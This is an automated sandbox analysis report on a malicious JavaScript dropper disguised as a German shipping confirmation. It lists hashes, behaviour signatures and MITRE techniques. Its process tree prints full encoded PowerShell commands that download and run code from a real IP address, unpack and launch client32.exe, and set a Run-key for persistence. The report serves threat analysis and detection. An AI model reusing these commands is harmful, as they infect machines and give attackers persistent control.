8598754b4df41f8cefcdb84722b0c7047c4a52cb28b78f4250d1c30737bb2f04

General

Target

Versandbestaetigung_155002_23098.js
Size

32KB
MD5

aacc50b6cb34a6464a811793fbbc9776
SHA1

5e4bc0f6dcbd8687fd54d7c75584fc784e44cf3d
SHA256

684bd7367b7f3365a7420b767632c453fa2ae68a937723cfc9b38a2381097ad6
SHA512

b33090526297166e73b28a41a5503cb2d98f6b1e601db27af21ed4069ce5629a5d59297699a0ed715d2e00360eb917bd831b98ae753596e6b30fc114d8f443fe
SSDEEP

384:pJ26gAE6CcsFVP8Nrpl3i+00+/hwaEV8dyXx9DCymMnOWesqoqAv4CCpuh6yEFUr:pJaWs0PFBVdXtriaCkeJ5LG7n5VVkm

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.193.43.96/upl.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://91.193.43.96/main.php

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	1428	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1428	powershell.exe
112	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	112	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 896	1976	wscript.exe	27
PID 1976 wrote to memory of 896	1976	wscript.exe	27
PID 1976 wrote to memory of 896	1976	wscript.exe	27
PID 896 wrote to memory of 1428	896	cmd.exe	29
PID 896 wrote to memory of 1428	896	cmd.exe	29
PID 896 wrote to memory of 1428	896	cmd.exe	29
PID 1428 wrote to memory of 112	1428	powershell.exe	30
PID 1428 wrote to memory of 112	1428	powershell.exe	30
PID 1428 wrote to memory of 112	1428	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Versandbestaetigung_155002_23098.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C pOwershelL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMQA5ADMALgA0ADMALgA5ADYALwB1AHAAbAAuAHAAcwAxACIAKQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwershelL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOQAxAC4AMQA5ADMALgA0ADMALgA5ADYALwB1AHAAbAAuAHAAcwAxACIAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcAA6AC8ALwA5ADEALgAxADkAMwAuADQAMwAuADkANgAvAG0AYQBpAG4ALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a3e8d28a005ce60cbca4aaac4622b74e

SHA1
0e39684ec358e809342d5d9633468b277ae0fdc3

SHA256
867e2d7e3abb946e0ea7fc43e3a330fa002b675eac8bda75fb5af7293f39112d

SHA512
45eeb2e4312a509da1a18cc2fcbe872d06a29daa91af64a77bee408db8aa28f350abac98898a1b04bdae5275a836517eb77cc937b5044057cdbac882495a62f7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WZDI3ZDEDDGQHP2WW0PA.temp

Filesize
7KB

MD5
a3e8d28a005ce60cbca4aaac4622b74e

SHA1
0e39684ec358e809342d5d9633468b277ae0fdc3

SHA256
867e2d7e3abb946e0ea7fc43e3a330fa002b675eac8bda75fb5af7293f39112d

SHA512
45eeb2e4312a509da1a18cc2fcbe872d06a29daa91af64a77bee408db8aa28f350abac98898a1b04bdae5275a836517eb77cc937b5044057cdbac882495a62f7

Download Submit
memory/112-69-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1428-59-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

Filesize
2.9MB

Download
memory/1428-60-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/1428-61-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1428-62-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1428-63-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads